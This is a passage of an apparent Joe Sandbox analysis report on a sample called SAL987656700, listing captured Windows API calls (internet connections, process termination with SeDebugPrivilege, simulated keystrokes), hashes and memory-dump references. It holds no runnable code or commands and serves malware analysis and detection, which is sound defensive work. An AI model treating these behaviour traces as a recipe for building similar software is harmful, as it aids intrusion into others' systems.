                                      • DestroyCursor.USER32(00000000), ref: 008D6901
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008D691E
                                      • DestroyCursor.USER32(00000000), ref: 008D692D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 3992029641-0
                                      • Opcode ID: e7ad3d90d9713e23fbb5a2ceafb59ee1ed43c41c35cd97ff527b41a4645ccd5c
                                      • Instruction ID: fac03f4d89618e9a2447bf50f7da5eedaea4efd7b469c24d7e59d916730e006f
                                      • Opcode Fuzzy Hash: e7ad3d90d9713e23fbb5a2ceafb59ee1ed43c41c35cd97ff527b41a4645ccd5c
                                      • Instruction Fuzzy Hash: 3D518AB061020AEFDB20DF25CC55FAA7BB5FB44364F184619F952D72A0EB70E990EB40
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008FC182
                                      • GetLastError.KERNEL32 ref: 008FC195
                                      • SetEvent.KERNEL32(?), ref: 008FC1A9
                                        • Part of subcall function 008FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008FC272
                                        • Part of subcall function 008FC253: GetLastError.KERNEL32 ref: 008FC322
                                        • Part of subcall function 008FC253: SetEvent.KERNEL32(?), ref: 008FC336
                                        • Part of subcall function 008FC253: InternetCloseHandle.WININET(00000000), ref: 008FC341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 337547030-0
                                      • Opcode ID: 0971cceb4f31f5c048f4a7b33ef39a6c62a89c9efd1e8fdc2f3181d822742cb8
                                      • Instruction ID: f37fcc8a553737ec65c25b3ecc9e14d5402b544437127db37d8d2a2cfe350f60
                                      • Opcode Fuzzy Hash: 0971cceb4f31f5c048f4a7b33ef39a6c62a89c9efd1e8fdc2f3181d822742cb8
                                      • Instruction Fuzzy Hash: 303190B164460DAFDB219FB5DE44AB6BBF8FF18300B14841DFA56C2611DB31EA14EB60
                                      APIs
                                        • Part of subcall function 008E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E3A57
                                        • Part of subcall function 008E3A3D: GetCurrentThreadId.KERNEL32 ref: 008E3A5E
                                        • Part of subcall function 008E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008E25B3), ref: 008E3A65
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E25BD
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008E25DB
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008E25DF
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E25E9
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008E2601
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 008E2605
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E260F
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008E2623
                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 008E2627
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      • Opcode ID: bb53f3ff5fb517834191d4a606408aabc8989bf3c636c8763368e819f0643257
                                      • Instruction ID: dc653eac3cac58e7ee50b1bf67b3e3e92af157b8ee984ee2029dc89cf5438497
                                      • Opcode Fuzzy Hash: bb53f3ff5fb517834191d4a606408aabc8989bf3c636c8763368e819f0643257
                                      • Instruction Fuzzy Hash: 3D01B5703D8764BBFB1067699C8AF993E59EB4AB51F104011F318AF0D1C9E11444DA6A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,008E1449,?,?,00000000), ref: 008E180C
                                      • RtlAllocateHeap.NTDLL(00000000,?,008E1449), ref: 008E1813
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008E1449,?,?,00000000), ref: 008E1828
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,008E1449,?,?,00000000), ref: 008E1830
                                      • DuplicateHandle.KERNEL32(00000000,?,008E1449,?,?,00000000), ref: 008E1833
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008E1449,?,?,00000000), ref: 008E1843
                                      • GetCurrentProcess.KERNEL32(008E1449,00000000,?,008E1449,?,?,00000000), ref: 008E184B
                                      • DuplicateHandle.KERNEL32(00000000,?,008E1449,?,?,00000000), ref: 008E184E
                                      • CreateThread.KERNEL32(00000000,00000000,008E1874,00000000,00000000,00000000), ref: 008E1868
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                      • String ID:
                                      • API String ID: 1422014791-0
                                      • Opcode ID: b9ea663ff0550438e786e4e1cc82d5f1a954e513ce0d8a197c64b75e22627b41
                                      • Instruction ID: 9e2b5cec00b67fa698f2b4675f71654e135717689b4b3f4a64562b837ae3425f
                                      • Opcode Fuzzy Hash: b9ea663ff0550438e786e4e1cc82d5f1a954e513ce0d8a197c64b75e22627b41
                                      • Instruction Fuzzy Hash: 4E01BFB53D4344BFE710AB65DC4DF977B6CEB89B11F408411FA05DB191C6749800DB20
                                      APIs
                                        • Part of subcall function 008ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 008ED501
                                        • Part of subcall function 008ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 008ED50F
                                        • Part of subcall function 008ED4DC: CloseHandle.KERNEL32(00000000), ref: 008ED5DC
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090A16D
                                      • GetLastError.KERNEL32 ref: 0090A180
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090A1B3
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0090A268
                                      • GetLastError.KERNEL32(00000000), ref: 0090A273
                                      • CloseHandle.KERNEL32(00000000), ref: 0090A2C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: a5d688db75ed508238a2ff26b4edf27c0358dd42893511a8c098316120b40669
                                      • Instruction ID: 4fbd44190a0307e1490bb5fa95e37ba1b4357eaacbb6463a344a24b98efaee37
                                      • Opcode Fuzzy Hash: a5d688db75ed508238a2ff26b4edf27c0358dd42893511a8c098316120b40669
                                      • Instruction Fuzzy Hash: AE617970208342AFD720DF19C894F26BBA5AF54318F18849CE4668B7A3C776ED45CBD2
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00913925
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0091393A
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00913954
                                      • _wcslen.LIBCMT ref: 00913999
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 009139C6
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009139F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcslen
                                      • String ID: SysListView32
                                      • API String ID: 2147712094-78025650
                                      • Opcode ID: 8afc7a8469eb36a21a0f6e12199fa982b5a400c56bc97ea7d7be4e9cde9e87c9
                                      • Instruction ID: 9cc6c8f91a137bd40ce5f7234134eca24bbc428af6e6799965c3571117ac854a
                                      • Opcode Fuzzy Hash: 8afc7a8469eb36a21a0f6e12199fa982b5a400c56bc97ea7d7be4e9cde9e87c9
                                      • Instruction Fuzzy Hash: 5841AE71A0021DABEF219F64CC49BEA7BB9EF48354F104566F958E7281D7B19A80CB90
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008EBCFD
                                      • IsMenu.USER32(00000000), ref: 008EBD1D
                                      • CreatePopupMenu.USER32 ref: 008EBD53
                                      • GetMenuItemCount.USER32(01045AF0), ref: 008EBDA4
                                      • InsertMenuItemW.USER32(01045AF0,?,00000001,00000030), ref: 008EBDCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID: 0$2
                                      • API String ID: 93392585-3793063076
                                      • Opcode ID: 98c1288cb7a2a94254f277fd1d1f31f745289949c01e334b3b012a2bd863a12a
                                      • Instruction ID: 6c171caab3e8bbf1a7c98bde6252936c22f78de25e6197fbfab4bb1ad88bff7f
                                      • Opcode Fuzzy Hash: 98c1288cb7a2a94254f277fd1d1f31f745289949c01e334b3b012a2bd863a12a
                                      • Instruction Fuzzy Hash: C3519E70B04289ABDB20CFAADC84BAFBBF5FF46314F148119E411D7290D7709941CB51
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 008EC913
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 8685fbc4f32f8b6702556c08395822fba6fa04028c4808f30b707dde6816918c
                                      • Instruction ID: fb87b74eb52b7fec3ce87f93729bcdc9afba0c1c3e201905a30246213cd5dc22
                                      • Opcode Fuzzy Hash: 8685fbc4f32f8b6702556c08395822fba6fa04028c4808f30b707dde6816918c
                                      • Instruction Fuzzy Hash: E1110071B8935ABAF7016B599C83CAE6B9CFF57358B10003AF500E62D3D7B46D015265
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$LocalTime
                                      • String ID:
                                      • API String ID: 952045576-0
                                      • Opcode ID: f2680aacbdc2e3135b150bdd0373e0266c10186d2547317028a6656a099266d6
                                      • Instruction ID: 8487cd7ff9666c8ba06f84ba5af9c654ab75ae1d1241d2d3c4d5396227579697
                                      • Opcode Fuzzy Hash: f2680aacbdc2e3135b150bdd0373e0266c10186d2547317028a6656a099266d6
                                      • Instruction Fuzzy Hash: DB419065D10258A5DB11EBF88C8AACFB7ACFF46310F548462E518E3921FB34E255C3A6
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 0089F953
                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 008DF3D1
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 008DF454
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: eebbb6f2d96db1e7c64671de860d83808b09b93757f88a6b7fb9a22eea5c10a6
                                      • Instruction ID: 7352cf7dd0e33a7e88850954f28038245ff9a6a44e21af10898c0b3c113f7b13
                                      • Opcode Fuzzy Hash: eebbb6f2d96db1e7c64671de860d83808b09b93757f88a6b7fb9a22eea5c10a6
                                      • Instruction Fuzzy Hash: 5441D831618640BECF3DAB29888876A7F92FB56314F1C853DF347D6663C6719880EB51
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00912D1B
                                      • GetDC.USER32(00000000), ref: 00912D23
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00912D2E
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00912D3A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00912D76
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00912D87
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00915A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00912DC2
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00912DE1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 30e6bb01a8a13ce1510daa304af84854fc35d9e468118915ff2866960068f5f3
                                      • Instruction ID: 2c926678c8becd66e4188e9b2845a48d6f6070e5ecf241fb935fab74668b570b
                                      • Opcode Fuzzy Hash: 30e6bb01a8a13ce1510daa304af84854fc35d9e468118915ff2866960068f5f3
                                      • Instruction Fuzzy Hash: FE319CB6355214BFEB118F50DC8AFEB3BADEF09751F048055FE089A291C6759C50CBA4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 003cc3f45c4474b73674081423167c19163f1e2c96205fe881eaa20b5b7485fa
                                      • Instruction ID: 45d420c0cdfe983355c83f4ac37981601fd6e70d157447a3df64c002d7aab94d
                                      • Opcode Fuzzy Hash: 003cc3f45c4474b73674081423167c19163f1e2c96205fe881eaa20b5b7485fa
                                      • Instruction Fuzzy Hash: BE218361740A4D7BEA149A268EA2FFB235CFE7338CF440020FD05DAA91F764ED1081E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: 950e2f8f746e21909fda476d1cf8b5d51eb63569cc86917df091f6cfdc033235
                                      • Instruction ID: 086521a3b42feaa0cca6094582e7c6069f97a38efa9690e9416e6e531dcbc34e
                                      • Opcode Fuzzy Hash: 950e2f8f746e21909fda476d1cf8b5d51eb63569cc86917df091f6cfdc033235
                                      • Instruction Fuzzy Hash: CBD19C75A0060AAFDF10CFA8C881BAEB7B9BF48344F158469E915EB281E770DD45CF90
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008C15CE
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C1651
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008C17FB,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C16E4
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C16FB
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C1777
                                      • __freea.LIBCMT ref: 008C17A2
                                      • __freea.LIBCMT ref: 008C17AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 2829977744-0
                                      • Opcode ID: d8252f6235572a5a6623ea893313a3103cb7d6f24587a6f1796fecaa20ec1e9b
                                      • Instruction ID: 280ec67160db8995b474d38e7e39f8fffc2adae1c2972487598ceb5788753b4c
                                      • Opcode Fuzzy Hash: d8252f6235572a5a6623ea893313a3103cb7d6f24587a6f1796fecaa20ec1e9b
                                      • Instruction Fuzzy Hash: 61918071E1021A9ADF208E64C8D9FEE7BB5FB4A714F18465DE801E7246DB35DC40CBA1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2610073882-625585964
